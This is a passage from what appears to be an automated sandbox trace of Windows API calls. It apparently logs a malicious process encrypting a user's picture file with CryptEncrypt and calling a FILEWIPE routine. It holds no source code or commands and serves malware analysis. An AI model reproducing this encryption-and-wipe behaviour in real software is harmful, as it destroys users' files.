lpMsg=0x87e924) returned 0 [0191.515] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.515] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.515] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.515] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0191.515] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.515] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.515] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0191.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0191.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0191.515] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.515] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0191.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0191.515] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0191.516] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0191.516] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.516] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0191.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0191.516] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0191.516] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0191.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0191.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0191.516] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0191.516] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.516] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x1270a, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x12710) returned 1 [0191.517] CharLowerBuffW (in: lpsz="byte[75537]", cchLength=0xb | out: lpsz="byte[75537]") returned 0xb [0191.517] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0191.517] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.517] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa71720*, pdwDataLen=0x87e820*=0x1270a, dwBufLen=0x12710 | out: pbData=0xa71720*, pdwDataLen=0x87e820*=0x12710) returned 1 [0191.518] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0191.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0191.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0191.518] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0191.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0191.518] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0191.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0191.528] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0191.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0191.528] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0191.528] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.529] CryptDestroyKey (hKey=0x90af18) returned 1 [0191.529] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0191.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0191.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0191.529] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0191.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0191.529] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0191.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0191.529] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0191.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0191.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0191.530] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0191.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0191.530] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0191.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0191.530] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0191.530] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0191.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0191.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0191.530] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.530] CryptReleaseContext (hProv=0x9c0c00, dwFlags=0x0) returned 1 [0191.530] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0191.530] FreeLibrary (hLibModule=0x74f20000) returned 1 [0191.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0191.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0191.531] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0191.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0191.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0191.546] TranslateMessage (lpMsg=0x87f36c) returned 0 [0191.546] DispatchMessageW (lpMsg=0x87f36c) returned 0x0 [0191.546] Shell_NotifyIconW (dwMessage=0x1, lpData=0x87ea08) returned 1 [0191.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0191.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0191.547] KillTimer (hWnd=0x1014c, uIDEvent=0x1) returned 1 [0191.547] SetTimer (hWnd=0x1014c, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0191.547] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0191.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0191.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0191.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0191.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0191.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0191.547] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\OV_bHLK.gif", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17de1ac0, ftCreationTime.dwHighDateTime=0x1d5da23, ftLastAccessTime.dwLowDateTime=0x8f3abf20, ftLastAccessTime.dwHighDateTime=0x1d5e431, ftLastWriteTime.dwLowDateTime=0x8f3abf20, ftLastWriteTime.dwHighDateTime=0x1d5e431, nFileSizeHigh=0x0, nFileSizeLow=0x1270a, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="OV_bHLK.gif", cAlternateFileName="")) returned 0x90ae18 [0191.547] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0191.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0191.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0191.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0191.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0191.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0191.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0191.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0191.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0191.548] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0191.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0191.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0191.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0191.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0191.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0191.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0191.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0191.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0191.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0191.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0191.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0191.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0191.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0191.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0191.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0191.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0191.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0191.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0191.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0191.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0191.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0191.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0191.549] CharLowerBuffW (in: lpsz="byte[75530]", cchLength=0xb | out: lpsz="byte[75530]") returned 0xb [0191.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0191.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0191.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0191.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0191.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0191.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0191.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0191.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0191.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0191.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0191.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0191.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0191.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0191.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0191.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0191.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0191.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1270a) returned 0xbca008 [0191.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0191.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0191.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0191.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0191.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0191.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0191.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0191.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0191.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0191.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0191.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0191.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0191.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0191.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc198 [0191.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0191.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0191.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0191.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0191.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0191.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0191.551] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0191.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0191.551] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0191.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0191.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0191.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0191.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1990 [0191.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0191.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0191.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0191.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0191.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0191.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0191.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0191.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0191.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0191.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0191.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0191.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0191.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0191.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0191.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0191.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0191.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0191.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0191.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1980 [0191.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0191.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0191.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0191.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1af0 [0191.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0191.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0191.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0191.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4c8 [0191.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0191.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0191.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0191.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0191.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0191.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0191.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0191.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0191.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0191.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0191.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0191.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0191.553] RtlAllocateHeap 